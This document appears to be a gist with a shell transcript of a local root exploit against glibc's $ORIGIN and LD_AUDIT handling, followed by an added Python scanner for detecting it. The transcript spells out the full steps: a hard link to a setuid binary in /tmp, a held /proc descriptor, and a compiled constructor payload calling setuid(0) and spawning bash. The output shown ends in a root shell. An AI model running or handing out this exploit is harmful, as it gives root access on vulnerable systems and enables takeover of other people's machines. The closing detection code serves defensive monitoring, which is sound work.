Last active: December 26, 2015 02:29
# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit
# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target
# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target
# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
# Remove the directory previously created
$ rm -rf /tmp/exploit/
# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)
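The state the transcript sets up before the final exec is observable from outside the shell: a descriptor whose /proc link is marked "(deleted)" but which still refers to a setuid or setgid executable. The scanner below is an added example, not part of the gist; it walks /proc/<pid>/fd, reads each link, and stat()s through the link to inspect the mode of the underlying inode (this works because /proc fd links resolve even after the path has been unlinked).

```python
import os
import stat
from dataclasses import dataclass

DELETED_SUFFIX = " (deleted)"


@dataclass
class Finding:
    pid: int
    fd: int
    target: str      # path the /proc link pointed at, with the "(deleted)" marker stripped
    setuid: bool
    setgid: bool


def classify_fd(pid: int, fd: int, link_target: str, mode: int):
    """Return a Finding if the descriptor points at an unlinked setuid/setgid
    regular file, otherwise None. Pure function so it can be tested on
    constructed input without a live /proc."""
    if not link_target.endswith(DELETED_SUFFIX):
        return None                      # file still exists on disk: ordinary open fd
    if not stat.S_ISREG(mode):
        return None                      # deleted pipes, sockets, ttys are not of interest
    suid = bool(mode & stat.S_ISUID)
    sgid = bool(mode & stat.S_ISGID)
    if not (suid or sgid):
        return None                      # deleted plain files (logs, temp files) are normal
    return Finding(pid, fd, link_target[: -len(DELETED_SUFFIX)], suid, sgid)


def scan_proc(proc_root: str = "/proc"):
    """Scan every readable /proc/<pid>/fd entry and collect findings.
    Descriptors of processes we lack permission for are skipped; run as
    root to see all processes."""
    findings = []
    try:
        entries = os.listdir(proc_root)
    except OSError:
        return findings                  # no procfs (non-Linux): nothing to scan
    for entry in entries:
        if not entry.isdigit():
            continue
        fd_dir = os.path.join(proc_root, entry, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:
            continue                     # process exited or is not ours
        for fd in fds:
            path = os.path.join(fd_dir, fd)
            try:
                target = os.readlink(path)
                mode = os.stat(path).st_mode   # follows the magic link to the inode
            except OSError:
                continue                 # descriptor closed between listdir and stat
            found = classify_fd(int(entry), int(fd), target, mode)
            if found is not None:
                findings.append(found)
    return findings
```

Run `scan_proc()` periodically or from a host-based agent; a hit is worth correlating with the owning process's environment (LD_AUDIT, LD_PRELOAD) and with recent unlink activity under world-writable directories.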